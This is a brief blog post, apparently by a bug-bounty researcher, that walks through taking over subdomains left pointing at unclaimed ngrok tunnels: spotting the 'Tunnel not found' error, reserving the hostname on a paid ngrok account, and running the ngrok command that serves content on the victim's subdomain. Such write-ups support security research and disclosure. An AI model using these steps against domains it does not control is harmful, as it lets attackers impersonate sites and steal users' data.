This post is about taking over vulnerable subdomains pointing to ngrok service.
A few days back streaak  sent me a url and told me to takeover the subdomain using the steps present here: https://github.com/EdOverflow/can-i-take-over-xyz/issues/85 

So I setup my ngrok account to takeover the subdomain but they didn’t work as mention in above url , when you run the command ./ngrok http 80 -subdomain cnameentry     it should have taken over the subdomain but it didn’t. It will run ngrok on the cname only, not on the actual subdomain. 
So I decided to test more and i set up ngrok on my own subdomain to test it.

Take over vulnerable subdomain:

If you visit vulnerable subdomain, error will be: Tunnel subdomain.example.com not found

check cname entry of subdomain, it will be something like http://xxxxxxxx.cname.us.ngrok.io/

  1. Set up account on https://ngrok.com/

  2. Subdomain service for ngrok is only available on paid version.so i suggest you to purchase paid version: https://dashboard.ngrok.com/billing 

  3. Once your account is done, set up ngrok to your local machine , follow these steps: https://dashboard.ngrok.com/get-started

  4. Once you’re done with set up locally. go to here: https://dashboard.ngrok.com/reserved Where you can reserve vulnerable subdomain. enter subdomain and click on reserve.

  5. Now go to your local machine and run this command to takeover vulnerable subdomain:ngrok http -region=us -hostname=subdomain.example.com 80 



Paresh Parmar

Leave a Reply

Your email address will not be published. Required fields are marked *